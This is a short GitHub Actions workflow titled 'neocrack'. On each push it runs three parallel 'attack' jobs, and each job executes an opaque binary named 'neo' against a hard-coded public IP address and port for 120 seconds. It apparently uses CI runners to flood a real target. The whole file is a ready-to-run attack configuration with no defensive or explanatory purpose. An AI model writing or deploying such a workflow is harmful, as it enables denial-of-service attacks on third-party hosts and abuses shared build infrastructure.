name: neocrack by ⏤͟͟͞͞𝘼𝙇𝙋𝙃𝘼 ✧.
on: [push]
jobs:
  attack-parallel:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1, 2, 3]
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x neo
      - run: ./neo 91.108.17.56 32000 120
